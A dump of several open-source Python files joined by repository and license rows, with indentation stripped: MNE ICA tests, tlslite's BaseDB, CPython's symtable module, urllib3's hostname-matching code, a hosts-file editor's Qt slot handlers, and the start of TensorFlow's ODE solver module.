ica.exclude = [0]
ica.labels_ = dict(blink=[0], think=[1])
ica_sorted = _sort_components(ica, [3, 2, 1, 0], copy=True)
assert_equal(ica_sorted.exclude, [3])
assert_equal(ica_sorted.labels_, dict(blink=[3], think=[2]))
# epochs extraction from raw fit
assert_raises(RuntimeError, ica.get_sources, epochs)
# test reading and writing
test_ica_fname = op.join(op.dirname(tempdir), 'test-ica.fif')
for cov in (None, test_cov):
ica = ICA(noise_cov=cov, n_components=2, max_pca_components=4,
n_pca_components=4)
with warnings.catch_warnings(record=True): # ICA does not converge
ica.fit(raw, picks=picks, start=start, stop=stop2)
sources = ica.get_sources(epochs).get_data()
assert_true(ica.mixing_matrix_.shape == (2, 2))
assert_true(ica.unmixing_matrix_.shape == (2, 2))
assert_true(ica.pca_components_.shape == (4, len(picks)))
assert_true(sources.shape[1] == ica.n_components_)
for exclude in [[], [0]]:
ica.exclude = exclude
ica.labels_ = {'foo': [0]}
ica.save(test_ica_fname)
ica_read = read_ica(test_ica_fname)
assert_true(ica.exclude == ica_read.exclude)
assert_equal(ica.labels_, ica_read.labels_)
ica.exclude = []
ica.apply(raw, exclude=[1])
assert_true(ica.exclude == [])
ica.exclude = [0, 1]
ica.apply(raw, exclude=[1])
assert_true(ica.exclude == [0, 1])
ica_raw = ica.get_sources(raw)
assert_true(ica.exclude == [ica_raw.ch_names.index(e) for e in
ica_raw.info['bads']])
# test filtering
d1 = ica_raw._data[0].copy()
ica_raw.filter(4, 20, l_trans_bandwidth='auto',
h_trans_bandwidth='auto', filter_length='auto',
phase='zero', fir_window='hamming')
assert_equal(ica_raw.info['lowpass'], 20.)
assert_equal(ica_raw.info['highpass'], 4.)
assert_true((d1 != ica_raw._data[0]).any())
d1 = ica_raw._data[0].copy()
ica_raw.notch_filter([10], filter_length='auto', trans_bandwidth=10,
phase='zero', fir_window='hamming')
assert_true((d1 != ica_raw._data[0]).any())
ica.n_pca_components = 2
ica.method = 'fake'
ica.save(test_ica_fname)
ica_read = read_ica(test_ica_fname)
assert_true(ica.n_pca_components == ica_read.n_pca_components)
assert_equal(ica.method, ica_read.method)
assert_equal(ica.labels_, ica_read.labels_)
# check type consistency
attrs = ('mixing_matrix_ unmixing_matrix_ pca_components_ '
'pca_explained_variance_ _pre_whitener')
def f(x, y):
return getattr(x, y).dtype
for attr in attrs.split():
assert_equal(f(ica_read, attr), f(ica, attr))
ica.n_pca_components = 4
ica_read.n_pca_components = 4
ica.exclude = []
ica.save(test_ica_fname)
ica_read = read_ica(test_ica_fname)
for attr in ['mixing_matrix_', 'unmixing_matrix_', 'pca_components_',
'pca_mean_', 'pca_explained_variance_',
'_pre_whitener']:
assert_array_almost_equal(getattr(ica, attr),
getattr(ica_read, attr))
assert_true(ica.ch_names == ica_read.ch_names)
assert_true(isinstance(ica_read.info, Info))
sources = ica.get_sources(raw)[:, :][0]
sources2 = ica_read.get_sources(raw)[:, :][0]
assert_array_almost_equal(sources, sources2)
_raw1 = ica.apply(raw, exclude=[1])
_raw2 = ica_read.apply(raw, exclude=[1])
assert_array_almost_equal(_raw1[:, :][0], _raw2[:, :][0])
os.remove(test_ica_fname)
# check scrore funcs
for name, func in get_score_funcs().items():
if name in score_funcs_unsuited:
continue
scores = ica.score_sources(raw, target='EOG 061', score_func=func,
start=0, stop=10)
assert_true(ica.n_components_ == len(scores))
# check univariate stats
scores = ica.score_sources(raw, score_func=stats.skew)
# check exception handling
assert_raises(ValueError, ica.score_sources, raw,
target=np.arange(1))
params = []
params += [(None, -1, slice(2), [0, 1])] # varicance, kurtosis idx params
params += [(None, 'MEG 1531')] # ECG / EOG channel params
for idx, ch_name in product(*params):
ica.detect_artifacts(raw, start_find=0, stop_find=50, ecg_ch=ch_name,
eog_ch=ch_name, skew_criterion=idx,
var_criterion=idx, kurt_criterion=idx)
with warnings.catch_warnings(record=True):
idx, scores = ica.find_bads_ecg(raw, method='ctps')
assert_equal(len(scores), ica.n_components_)
idx, scores = ica.find_bads_ecg(raw, method='correlation')
assert_equal(len(scores), ica.n_components_)
idx, scores = ica.find_bads_eog(raw)
assert_equal(len(scores), ica.n_components_)
ica.labels_ = None
idx, scores = ica.find_bads_ecg(epochs, method='ctps')
assert_equal(len(scores), ica.n_components_)
assert_raises(ValueError, ica.find_bads_ecg, epochs.average(),
method='ctps')
assert_raises(ValueError, ica.find_bads_ecg, raw,
method='crazy-coupling')
raw.info['chs'][raw.ch_names.index('EOG 061') - 1]['kind'] = 202
idx, scores = ica.find_bads_eog(raw)
assert_true(isinstance(scores, list))
assert_equal(len(scores[0]), ica.n_components_)
# check score funcs
for name, func in get_score_funcs().items():
if name in score_funcs_unsuited:
continue
scores = ica.score_sources(epochs_eog, target='EOG 061',
score_func=func)
assert_true(ica.n_components_ == len(scores))
# check univariate stats
scores = ica.score_sources(epochs, score_func=stats.skew)
# check exception handling
assert_raises(ValueError, ica.score_sources, epochs,
target=np.arange(1))
# ecg functionality
ecg_scores = ica.score_sources(raw, target='MEG 1531',
score_func='pearsonr')
with warnings.catch_warnings(record=True): # filter attenuation warning
ecg_events = ica_find_ecg_events(raw,
sources[np.abs(ecg_scores).argmax()])
assert_true(ecg_events.ndim == 2)
# eog functionality
eog_scores = ica.score_sources(raw, target='EOG 061',
score_func='pearsonr')
with warnings.catch_warnings(record=True): # filter attenuation warning
eog_events = ica_find_eog_events(raw,
sources[np.abs(eog_scores).argmax()])
assert_true(eog_events.ndim == 2)
# Test ica fiff export
ica_raw = ica.get_sources(raw, start=0, stop=100)
assert_true(ica_raw.last_samp - ica_raw.first_samp == 100)
assert_true(len(ica_raw._filenames) == 0) # API consistency
ica_chans = [ch for ch in ica_raw.ch_names if 'ICA' in ch]
assert_true(ica.n_components_ == len(ica_chans))
test_ica_fname = op.join(op.abspath(op.curdir), 'test-ica_raw.fif')
ica.n_components = np.int32(ica.n_components)
ica_raw.save(test_ica_fname, overwrite=True)
ica_raw2 = read_raw_fif(test_ica_fname, preload=True, add_eeg_ref=False)
assert_allclose(ica_raw._data, ica_raw2._data, rtol=1e-5, atol=1e-4)
ica_raw2.close()
os.remove(test_ica_fname)
# Test ica epochs export
ica_epochs = ica.get_sources(epochs)
assert_true(ica_epochs.events.shape == epochs.events.shape)
ica_chans = [ch for ch in ica_epochs.ch_names if 'ICA' in ch]
assert_true(ica.n_components_ == len(ica_chans))
assert_true(ica.n_components_ == ica_epochs.get_data().shape[1])
assert_true(ica_epochs._raw is None)
assert_true(ica_epochs.preload is True)
# test float n pca components
ica.pca_explained_variance_ = np.array([0.2] * 5)
ica.n_components_ = 0
for ncomps, expected in [[0.3, 1], [0.9, 4], [1, 1]]:
ncomps_ = ica._check_n_pca_components(ncomps)
assert_true(ncomps_ == expected)
@requires_sklearn
def test_run_ica():
"""Test run_ica function."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
params = []
params += [(None, -1, slice(2), [0, 1])] # varicance, kurtosis idx
params += [(None, 'MEG 1531')] # ECG / EOG channel params
for idx, ch_name in product(*params):
warnings.simplefilter('always')
with warnings.catch_warnings(record=True):
run_ica(raw, n_components=2, start=0, stop=6, start_find=0,
stop_find=5, ecg_ch=ch_name, eog_ch=ch_name,
skew_criterion=idx, var_criterion=idx, kurt_criterion=idx)
@requires_sklearn
def test_ica_reject_buffer():
"""Test ICA data raw buffer rejection."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
ica = ICA(n_components=3, max_pca_components=4, n_pca_components=4)
raw._data[2, 1000:1005] = 5e-12
with catch_logging() as drop_log:
with warnings.catch_warnings(record=True):
ica.fit(raw, picks[:5], reject=dict(mag=2.5e-12), decim=2,
tstep=0.01, verbose=True)
assert_true(raw._data[:5, ::2].shape[1] - 4 == ica.n_samples_)
log = [l for l in drop_log.getvalue().split('\n') if 'detected' in l]
assert_equal(len(log), 1)
@requires_sklearn
def test_ica_twice():
"""Test running ICA twice."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg='grad', exclude='bads')
n_components = 0.9
max_pca_components = None
n_pca_components = 1.1
with warnings.catch_warnings(record=True):
ica1 = ICA(n_components=n_components,
max_pca_components=max_pca_components,
n_pca_components=n_pca_components, random_state=0)
ica1.fit(raw, picks=picks, decim=3)
raw_new = ica1.apply(raw, n_pca_components=n_pca_components)
ica2 = ICA(n_components=n_components,
max_pca_components=max_pca_components,
n_pca_components=1.0, random_state=0)
ica2.fit(raw_new, picks=picks, decim=3)
assert_equal(ica1.n_components_, ica2.n_components_)
@requires_sklearn
def test_fit_params():
"""Test fit_params for ICA."""
assert_raises(ValueError, ICA, fit_params=dict(extended=True))
fit_params = {}
ICA(fit_params=fit_params) # test no side effects
assert_equal(fit_params, {})
@requires_sklearn
def test_bad_channels():
"""Test exception when unsupported channels are used."""
chs = [i for i in _kind_dict]
data_chs = _DATA_CH_TYPES_SPLIT + ['eog']
chs_bad = list(set(chs) - set(data_chs))
info = create_info(len(chs), 500, chs)
data = np.random.rand(len(chs), 50)
raw = RawArray(data, info)
data = np.random.rand(100, len(chs), 50)
epochs = EpochsArray(data, info)
n_components = 0.9
ica = ICA(n_components=n_components, method='fastica')
for inst in [raw, epochs]:
for ch in chs_bad:
# Test case for only bad channels
picks_bad1 = pick_types(inst.info, meg=False,
**{str(ch): True})
# Test case for good and bad channels
picks_bad2 = pick_types(inst.info, meg=True,
**{str(ch): True})
assert_raises(ValueError, ica.fit, inst, picks=picks_bad1)
assert_raises(ValueError, ica.fit, inst, picks=picks_bad2)
assert_raises(ValueError, ica.fit, inst, picks=[])
@requires_sklearn
def test_eog_channel():
"""Test that EOG channel is included when performing ICA."""
raw = read_raw_fif(raw_fname, preload=True, add_eeg_ref=False)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=True, ecg=False,
eog=True, exclude='bads')
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True,
add_eeg_ref=False)
n_components = 0.9
ica = ICA(n_components=n_components, method='fastica')
# Test case for MEG and EOG data. Should have EOG channel
for inst in [raw, epochs]:
picks1a = pick_types(inst.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:4]
picks1b = pick_types(inst.info, meg=False, stim=False, ecg=False,
eog=True, exclude='bads')
picks1 = np.append(picks1a, picks1b)
ica.fit(inst, picks=picks1)
assert_true(any('EOG' in ch for ch in ica.ch_names))
# Test case for MEG data. Should have no EOG channel
for inst in [raw, epochs]:
picks1 = pick_types(inst.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:5]
ica.fit(inst, picks=picks1)
assert_false(any('EOG' in ch for ch in ica.ch_names))
run_tests_if_main()
| bsd-3-clause |
klusark/android_external_chromium_org | third_party/tlslite/tlslite/BaseDB.py | 121 | 3389 | """Base class for SharedKeyDB and VerifierDB."""
import anydbm
import thread
class BaseDB:
def __init__(self, filename, type):
self.type = type
self.filename = filename
if self.filename:
self.db = None
else:
self.db = {}
self.lock = thread.allocate_lock()
def create(self):
"""Create a new on-disk database.
@raise anydbm.error: If there's a problem creating the database.
"""
if self.filename:
self.db = anydbm.open(self.filename, "n") #raises anydbm.error
self.db["--Reserved--type"] = self.type
self.db.sync()
else:
self.db = {}
def open(self):
"""Open a pre-existing on-disk database.
@raise anydbm.error: If there's a problem opening the database.
@raise ValueError: If the database is not of the right type.
"""
if not self.filename:
raise ValueError("Can only open on-disk databases")
self.db = anydbm.open(self.filename, "w") #raises anydbm.error
try:
if self.db["--Reserved--type"] != self.type:
raise ValueError("Not a %s database" % self.type)
except KeyError:
raise ValueError("Not a recognized database")
def __getitem__(self, username):
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
valueStr = self.db[username]
finally:
self.lock.release()
return self._getItem(username, valueStr)
def __setitem__(self, username, value):
if self.db == None:
raise AssertionError("DB not open")
valueStr = self._setItem(username, value)
self.lock.acquire()
try:
self.db[username] = valueStr
if self.filename:
self.db.sync()
finally:
self.lock.release()
def __delitem__(self, username):
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
del(self.db[username])
if self.filename:
self.db.sync()
finally:
self.lock.release()
def __contains__(self, username):
"""Check if the database contains the specified username.
@type username: str
@param username: The username to check for.
@rtype: bool
@return: True if the database contains the username, False
otherwise.
"""
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
return self.db.has_key(username)
finally:
self.lock.release()
def check(self, username, param):
value = self.__getitem__(username)
return self._checkItem(value, username, param)
def keys(self):
"""Return a list of usernames in the database.
@rtype: list
@return: The usernames in the database.
"""
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
usernames = self.db.keys()
finally:
self.lock.release()
usernames = [u for u in usernames if not u.startswith("--Reserved--")]
return usernames | bsd-3-clause |
gautamMalu/rootfs_xen_arndale | usr/lib/python2.7/symtable.py | 68 | 7437 | """Interface to the compiler's internal symbol tables"""
import _symtable
from _symtable import (USE, DEF_GLOBAL, DEF_LOCAL, DEF_PARAM,
DEF_IMPORT, DEF_BOUND, OPT_IMPORT_STAR, OPT_EXEC, OPT_BARE_EXEC,
SCOPE_OFF, SCOPE_MASK, FREE, GLOBAL_IMPLICIT, GLOBAL_EXPLICIT, CELL, LOCAL)
import weakref
__all__ = ["symtable", "SymbolTable", "Class", "Function", "Symbol"]
def symtable(code, filename, compile_type):
top = _symtable.symtable(code, filename, compile_type)
return _newSymbolTable(top, filename)
class SymbolTableFactory:
def __init__(self):
self.__memo = weakref.WeakValueDictionary()
def new(self, table, filename):
if table.type == _symtable.TYPE_FUNCTION:
return Function(table, filename)
if table.type == _symtable.TYPE_CLASS:
return Class(table, filename)
return SymbolTable(table, filename)
def __call__(self, table, filename):
key = table, filename
obj = self.__memo.get(key, None)
if obj is None:
obj = self.__memo[key] = self.new(table, filename)
return obj
_newSymbolTable = SymbolTableFactory()
class SymbolTable(object):
def __init__(self, raw_table, filename):
self._table = raw_table
self._filename = filename
self._symbols = {}
def __repr__(self):
if self.__class__ == SymbolTable:
kind = ""
else:
kind = "%s " % self.__class__.__name__
if self._table.name == "global":
return "<{0}SymbolTable for module {1}>".format(kind, self._filename)
else:
return "<{0}SymbolTable for {1} in {2}>".format(kind,
self._table.name,
self._filename)
def get_type(self):
if self._table.type == _symtable.TYPE_MODULE:
return "module"
if self._table.type == _symtable.TYPE_FUNCTION:
return "function"
if self._table.type == _symtable.TYPE_CLASS:
return "class"
assert self._table.type in (1, 2, 3), \
"unexpected type: {0}".format(self._table.type)
def get_id(self):
return self._table.id
def get_name(self):
return self._table.name
def get_lineno(self):
return self._table.lineno
def is_optimized(self):
return bool(self._table.type == _symtable.TYPE_FUNCTION
and not self._table.optimized)
def is_nested(self):
return bool(self._table.nested)
def has_children(self):
return bool(self._table.children)
def has_exec(self):
"""Return true if the scope uses exec"""
return bool(self._table.optimized & (OPT_EXEC | OPT_BARE_EXEC))
def has_import_star(self):
"""Return true if the scope uses import *"""
return bool(self._table.optimized & OPT_IMPORT_STAR)
def get_identifiers(self):
return self._table.symbols.keys()
def lookup(self, name):
sym = self._symbols.get(name)
if sym is None:
flags = self._table.symbols[name]
namespaces = self.__check_children(name)
sym = self._symbols[name] = Symbol(name, flags, namespaces)
return sym
def get_symbols(self):
return [self.lookup(ident) for ident in self.get_identifiers()]
def __check_children(self, name):
return [_newSymbolTable(st, self._filename)
for st in self._table.children
if st.name == name]
def get_children(self):
return [_newSymbolTable(st, self._filename)
for st in self._table.children]
class Function(SymbolTable):
# Default values for instance variables
__params = None
__locals = None
__frees = None
__globals = None
def __idents_matching(self, test_func):
return tuple([ident for ident in self.get_identifiers()
if test_func(self._table.symbols[ident])])
def get_parameters(self):
if self.__params is None:
self.__params = self.__idents_matching(lambda x:x & DEF_PARAM)
return self.__params
def get_locals(self):
if self.__locals is None:
locs = (LOCAL, CELL)
test = lambda x: ((x >> SCOPE_OFF) & SCOPE_MASK) in locs
self.__locals = self.__idents_matching(test)
return self.__locals
def get_globals(self):
if self.__globals is None:
glob = (GLOBAL_IMPLICIT, GLOBAL_EXPLICIT)
test = lambda x:((x >> SCOPE_OFF) & SCOPE_MASK) in glob
self.__globals = self.__idents_matching(test)
return self.__globals
def get_frees(self):
if self.__frees is None:
is_free = lambda x:((x >> SCOPE_OFF) & SCOPE_MASK) == FREE
self.__frees = self.__idents_matching(is_free)
return self.__frees
class Class(SymbolTable):
__methods = None
def get_methods(self):
if self.__methods is None:
d = {}
for st in self._table.children:
d[st.name] = 1
self.__methods = tuple(d)
return self.__methods
class Symbol(object):
def __init__(self, name, flags, namespaces=None):
self.__name = name
self.__flags = flags
self.__scope = (flags >> SCOPE_OFF) & SCOPE_MASK # like PyST_GetScope()
self.__namespaces = namespaces or ()
def __repr__(self):
return "<symbol {0!r}>".format(self.__name)
def get_name(self):
return self.__name
def is_referenced(self):
return bool(self.__flags & _symtable.USE)
def is_parameter(self):
return bool(self.__flags & DEF_PARAM)
def is_global(self):
return bool(self.__scope in (GLOBAL_IMPLICIT, GLOBAL_EXPLICIT))
def is_declared_global(self):
return bool(self.__scope == GLOBAL_EXPLICIT)
def is_local(self):
return bool(self.__flags & DEF_BOUND)
def is_free(self):
return bool(self.__scope == FREE)
def is_imported(self):
return bool(self.__flags & DEF_IMPORT)
def is_assigned(self):
return bool(self.__flags & DEF_LOCAL)
def is_namespace(self):
"""Returns true if name binding introduces new namespace.
If the name is used as the target of a function or class
statement, this will be true.
Note that a single name can be bound to multiple objects. If
is_namespace() is true, the name may also be bound to other
objects, like an int or list, that does not introduce a new
namespace.
"""
return bool(self.__namespaces)
def get_namespaces(self):
"""Return a list of namespaces bound to this name"""
return self.__namespaces
def get_namespace(self):
"""Returns the single namespace bound to this name.
Raises ValueError if the name is bound to multiple namespaces.
"""
if len(self.__namespaces) != 1:
raise ValueError, "name is bound to multiple namespaces"
return self.__namespaces[0]
if __name__ == "__main__":
import os, sys
src = open(sys.argv[0]).read()
mod = symtable(src, os.path.split(sys.argv[0])[1], "exec")
for ident in mod.get_identifiers():
info = mod.lookup(ident)
print info, info.is_local(), info.is_namespace()
| gpl-2.0 |
thomas-young-2013/wherehowsX | metadata-etl/src/main/resources/jython/requests/packages/urllib3/packages/ssl_match_hostname/_implementation.py | 2360 | 3778 | """The match_hostname() function from Python 3.3.3, essential when using SSL."""
# Note: This file is under the PSF license as the code comes from the python
# stdlib. http://docs.python.org/3/license.html
import re
__version__ = '3.4.0.2'
class CertificateError(ValueError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
# Ported from python3-syntax:
# leftmost, *remainder = dn.split(r'.')
parts = dn.split(r'.')
leftmost = parts[0]
remainder = parts[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survey of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
| apache-2.0 |
Lyon1994/huhamhire-hosts | gui/qdialog_slots.py | 24 | 11695 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# qdialog_slots.py : Qt slots response to signals on the main dialog.
#
# Copyleft (C) 2014 - huhamhire hosts team <hosts@huhamhire.com>
# =====================================================================
# Licensed under the GNU General Public License, version 3. You should
# have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING
# THE WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE.
# =====================================================================
__author__ = "huhamhire <me@huhamhire.com>"
import shutil
import time
from PyQt4 import QtCore, QtGui
from language import LangUtil
from qdialog_d import QDialogDaemon
from util_ui import _translate
import sys
sys.path.append("..")
from util import RetrieveData
class QDialogSlots(QDialogDaemon):
"""
QDialogSlots class provides `Qt slots` to deal with the `Qt signals`
emitted by the widgets on the main dialog operated by users.
.. note:: This class is subclass of :class:`~gui.qdialog_d.QDialogDaemon`
class and parent class of :class:`~gui.hostsutil.HostsUtil`.
:ivar int ipv_id: An flag indicating current IP version setting. The
value could be 1 or 0:
====== ==========
ipv_id IP Version
====== ==========
1 IPv6
0 IPv4
====== ==========
.. seealso::
:meth:`~gui.qdialog_slots.QDialogSlots.on_IPVersion_changed`. in
this class.
:ivar str make_path: Temporary path to store generated hosts file. The
default value of :attr:`make_path` is "`./hosts`".
:ivar int mirror_id: Index number of current selected server from the
mirror list.
"""
_ipv_id = 0
make_path = "./hosts"
mirror_id = 0
def __init__(self):
"""
Initialize a new instance of this class.
"""
super(QDialogSlots, self).__init__()
def reject(self):
"""
Close this program while the reject signal is emitted.
.. note:: This method is the slot responses to the reject signal from
an instance of the main dialog.
"""
self.close()
return QtGui.QDialog.reject(self)
def close(self):
"""
Close this program while the close signal is emitted.
.. note:: This method is the slot responses to the close signal from
an instance of the main dialog.
"""
try:
RetrieveData.clear()
except:
pass
super(QDialogDaemon, self).close()
def mouseMoveEvent(self, e):
"""
Allow drag operations to set the new position for current cursor.
:param e: Current mouse event.
:type e: :class:`PyQt4.QtGui.QMouseEvent`
"""
if e.buttons() & QtCore.Qt.LeftButton:
try:
self.move(e.globalPos() - self.dragPos)
except AttributeError:
pass
e.accept()
def mousePressEvent(self, e):
"""
Allow press operation to set the new position for current dialog.
:param e: Current mouse event.
:type e: :class:`PyQt4.QtGui.QMouseEvent`
"""
if e.button() == QtCore.Qt.LeftButton:
self.dragPos = e.globalPos() - self.frameGeometry().topLeft()
e.accept()
def on_Mirror_changed(self, mirr_id):
"""
Change the current server selection.
.. note:: This method is the slot responses to the signal argument
:attr:`mirr_id` from SelectMirror widget while the value is
changed.
:param mirr_id: Index number of current mirror server.
"""
self.mirror_id = mirr_id
self.check_connection()
def on_IPVersion_changed(self, ipv_id):
"""
Change the current IP version setting.
.. note:: This method is the slot responses to the signal argument
:attr:`ipv_id` from SelectIP widget while the value is changed.
:param ipv_id: An flag indicating current IP version setting. The
value could be 1 or 0:
====== ==========
ipv_id IP Version
====== ==========
1 IPv6
0 IPv4
====== ==========
:type ipv_id: int
"""
if self._ipv_id != ipv_id:
self._ipv_id = ipv_id
if not RetrieveData.db_exists():
self.warning_no_datafile()
else:
self.set_func_list(0)
self.refresh_func_list()
def on_Selection_changed(self, item):
"""
Change the current selection of modules to be applied to hosts file.
.. note:: This method is the slot responses to the signal argument
:attr:`item` from Functionlist widget while the item selection is
changed.
:param item: Row number of the item listed in Functionlist which is
changed by user.
:type item: int
"""
ip_flag = self._ipv_id
func_id = self.ui.Functionlist.row(item)
if self._funcs[ip_flag][func_id] == 0:
self._funcs[ip_flag][func_id] = 1
else:
self._funcs[ip_flag][func_id] = 0
mutex = RetrieveData.get_ids(self.choice[ip_flag][func_id][2])
for c_id, c in enumerate(self.choice[ip_flag]):
if c[0] == self.choice[ip_flag][func_id][0]:
if c[1] in mutex and self._funcs[ip_flag][c_id] == 1:
self._funcs[ip_flag][c_id] = 0
self.refresh_func_list()
def on_Lang_changed(self, lang):
"""
Change the UI language setting.
.. note:: This method is the slot responses to the signal argument
:attr:`lang` from SelectLang widget while the value is changed.
:param lang: The language name which is selected by user.
.. note:: This string is typically in the format of IETF language
tag. For example: en_US, en_GB, etc.
.. seealso:: :attr:`language` in :class:`~gui.language.LangUtil`
class.
:type lang: str
"""
new_lang = LangUtil.get_locale_by_language(unicode(lang))
trans = QtCore.QTranslator()
from hostsutil import LANG_DIR
trans.load(LANG_DIR + new_lang)
self.app.removeTranslator(self._trans)
self.app.installTranslator(trans)
self._trans = trans
self.ui.retranslateUi(self)
self.init_main()
self.check_connection()
def on_MakeHosts_clicked(self):
"""
Start operations to make a hosts file.
.. note:: This method is the slot responses to the signal from
ButtonApply widget while the button is clicked.
.. note:: No operations would be called if current session does not
have the privileges to change the hosts file.
"""
if not self._writable:
self.warning_permission()
return
if self.question_apply():
self.make_path = "./hosts"
self.make_hosts("system")
else:
return
def on_MakeANSI_clicked(self):
"""
Export a hosts file encoded in ANSI.
.. note:: This method is the slot responses to the signal from
ButtonANSI widget while the button is clicked.
"""
self.make_path = self.export_hosts()
if unicode(self.make_path) != u'':
self.make_hosts("ansi")
def on_MakeUTF8_clicked(self):
"""
Export a hosts file encoded in UTF-8.
.. note:: This method is the slot responses to the signal from
ButtonUTF widget while the button is clicked.
"""
self.make_path = self.export_hosts()
if unicode(self.make_path) != u'':
self.make_hosts("utf-8")
def on_Backup_clicked(self):
"""
Backup the hosts file of current operating system.
.. note:: This method is the slot responses to the signal from
ButtonBackup widget while the button is clicked.
"""
l_time = time.localtime(time.time())
backtime = time.strftime("%Y-%m-%d-%H%M%S", l_time)
filename = "hosts_" + backtime + ".bak"
if self.platform == "OS X":
filename = "/Users/" + filename
filepath = QtGui.QFileDialog.getSaveFileName(
self, _translate("Util", "Backup hosts", None),
QtCore.QString(filename),
_translate("Util", "Backup File(*.bak)", None))
if unicode(filepath) != u'':
shutil.copy2(self.hosts_path, unicode(filepath))
self.info_complete()
def on_Restore_clicked(self):
"""
Restore a previously backed up hosts file.
.. note:: This method is the slot responses to the signal from
ButtonRestore widget while the button is clicked.
This method would call
.. note:: No operations would be called if current session does not
have the privileges to change the hosts file.
"""
if not self._writable:
self.warning_permission()
return
filename = ''
if self.platform == "OS X":
filename = "/Users/" + filename
filepath = QtGui.QFileDialog.getOpenFileName(
self, _translate("Util", "Restore hosts", None),
QtCore.QString(filename),
_translate("Util", "Backup File(*.bak)", None))
if unicode(filepath) != u'':
shutil.copy2(unicode(filepath), self.hosts_path)
self.info_complete()
def on_CheckUpdate_clicked(self):
"""
Retrieve update information (metadata) of the latest data file from a
specified server.
.. note:: This method is the slot responses to the signal from
ButtonCheck widget while the button is clicked.
"""
if self.choice != [[], []]:
self.refresh_func_list()
self.set_update_click_btns()
if self._update == {} or self._update["version"] == \
unicode(_translate("Util", "[Error]", None)):
self.check_update()
def on_FetchUpdate_clicked(self):
"""
Retrieve the latest hosts data file.
.. note:: This method is the slot responses to the signal from
ButtonUpdate widget while the button is clicked.
This method would call operations to
.. note:: Method :meth:`~gui.qdialog_slots.on_CheckUpdate_clicked`
would be called if no update information has been set,
.. note:: If the current data is up-to-date, no data file would be
retrieved.
"""
self.set_fetch_click_btns()
self._down_flag = 1
if self._update == {} or self._update["version"] == \
unicode(_translate("Util", "[Error]", None)):
self.check_update()
elif self.new_version():
self.fetch_update()
else:
self.info_uptodate()
self.finish_fetch()
def on_LinkActivated(self, url):
"""
Open external link in browser.
.. note:: This method is the slot responses to the signal from a Label
widget while the text with a hyperlink which is clicked by user.
"""
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url)) | gpl-3.0 |
koobonil/Boss2D | Boss2D/addon/tensorflow-1.2.1_for_boss/tensorflow/contrib/integrate/python/ops/odes.py | 69 | 20508 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""ODE solvers for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
